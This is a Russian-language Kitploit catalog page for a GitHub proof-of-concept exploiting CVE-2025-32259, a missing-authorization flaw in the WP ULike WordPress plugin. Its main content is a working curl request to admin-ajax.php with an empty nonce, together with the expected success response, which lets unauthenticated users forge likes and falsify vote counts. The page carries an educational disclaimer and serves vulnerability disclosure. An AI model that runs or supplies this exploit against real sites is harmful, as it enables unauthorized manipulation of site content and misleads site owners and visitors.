Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
wp-ulike-cve-2025-32259-poc — В затронутых версиях плагина WP ULike отсутствует надлежащая проверка авторизации перед разрешением определенных AJAX-действий или манипуляций с голосованием. Это позволяет неаутентифицированным пользователям взаимодействовать с плагином так, как должны только вошедшие в систему пользователи — потенциально искажая голоса или внедряя вводящие в заблуждение данные. | Kitploit
Инструменты/GitHubGitHub/hossameahmed/wp-ulike-cve-2025-32259-poc
Анализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийТестирование на ПроникновениеОбучение и Образование
GitHubhossameahmed/wp-ulike-cve-2025-32259-poc

wp-ulike-cve-2025-32259-poc

Репозиторий
1 год назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →

Описание

В затронутых версиях плагина WP ULike отсутствует надлежащая проверка авторизации перед разрешением определенных AJAX-действий или манипуляций с голосованием. Это позволяет неаутентифицированным пользователям взаимодействовать с плагином так, как должны только вошедшие в систему пользователи — потенциально искажая голоса или внедряя вводящие в заблуждение данные.

Поделиться

WP ULike ≤ 4.7.9.1 - Неаутентифицированный спуфинг контента (CVE-2025-32259)

🔬 Простой PoC, демонстрирующий CVE-2025-32259 в плагине WP ULike для WordPress.
🚨 Только для образовательных целей – не тестируйте на системах без явного разрешения.


🧠 Обзор

WP ULike — популярный плагин для WordPress, который позволяет пользователям ставить лайки контенту на сайте. Версии до 4.7.9.1 страдают от уязвимости отсутствия авторизации, позволяющей неаутентифицированным пользователям подделывать действия «лайк» через AJAX-запросы.

  • CVE: CVE-2025-32259
  • Уязвимые версии: ≤ 4.7.9.1
  • Исправленная версия: 4.7.9.2

🚀 Доказательство концепции

Уязвимость позволяет неаутентифицированным пользователям взаимодействовать с AJAX-эндпоинтом и ставить лайки любому контенту (запись, комментарий и т.д.) без разрешения.

🔧 PoC-скрипт

root@kitploit:~
curl -X POST https://target-site.com/wp-admin/admin-ajax.php \
  -d "action=wp_ulike_process" \
  -d "method=likeThis" \
  -d "id=1" \
  -d "type=post" \
  -d "nonce=" \
  -H "Content-Type: application/x-www-form-urlencoded"

Замените id=1 на действительный ID записи.

Успешный ответ может выглядеть так:

root@kitploit:~
{"status":"success","msg":"You liked this."}
Скачать инструмент